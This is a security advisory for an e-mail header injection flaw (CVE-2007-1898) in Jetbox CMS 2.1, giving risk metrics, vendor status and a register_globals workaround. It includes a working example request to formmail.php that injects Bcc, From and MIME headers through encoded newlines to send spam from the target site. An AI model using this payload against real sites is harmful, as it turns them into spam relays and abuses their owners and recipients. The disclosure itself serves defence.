Jetbox CMS version 2.1 E-Mail Injection Vulnerability

2007.05.18
Risk: Medium
Local: No
Remote: Yes
CWE: N/A

netVigilance Security Advisory #26 Jetbox CMS version 2.1 E-Mail Injection Vulnerability Description: Jetbox content management system is seriously tested on usability & has a professional intuitive interface. The system is role based, with workflow and module orientated. All content is fully separated from layout. It uses php & mysql. Security problems in the product allow attackers to send any spam e-mails using mail form of target site. External References: Mitre CVE: CVE-2007-1898 NVD NIST: CVE-2007-1898 OSVDB: 34088 Summary: Jetbox content management system has a professional intuitive interface. Successful exploitation requires PHP register_globals set to On on the server. Advisory URL: http://www.netvigilance.com/advisory0026 Release Date: 05/15/2007 Severity: Risk: Medium CVSS Metrics Access Vector: Remote Access Complexity: High Authentication: Not-required Confidentiality Impact: None Integrity Impact: Partial Availability Impact: Partial Impact Bias: Normal CVSS Base Score: 3.7 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: E-mail injection. SecureScout Testcase ID: Vulnerable Systems: Jetbox version 2.1 Vulnerability Type: Email Injections using to send anonymous emails to other recipients. Vendor: Streamedge Consultancy & Development Vendor Status: Contact with the Vendor was established. The vendor refused to fix the issue and said that Jetbox is not maintained already. There is no official fix at the release of this Security Advisory Workaround: In the php.ini file set register_globals to Off. Example: REQUEST: http://[TARGET]/[JETBOX-DIRECTORY formmail.php?recipient=spam1 (at) somedomain (dot) com [email concealed]&_SETTINGS[allowed_email_host s][]=somedomain.com&subject=Some Spam Subject%0ABcc: spam_address2 (at) somedomain (dot) com [email concealed], spam_address2 (at) somedomain (dot) com [email concealed], spam_address4 (at) somedomain (dot) com [email concealed], spam_addressN (at) somedomain (dot) com [email concealed]%0AFrom: any_address (at) somedomain (dot) com [email concealed]%0AMIME-Version: 1.0%0AContent-Type: multipart/mixed; boundary=Hacker;%0A%0A-- Hacker%0ASome Spam Message%0A%0AContent-Type:text/html;name=any_file.html;%0AContent-Transf er-Encoding:8bit%0AContent-Disposition: attachment%0A%0AHTML File%0A%0A--Hacker--%0AOther text will be hide REPLY: Spam will be sent from the target site Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com ?? ?? ?? ??


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top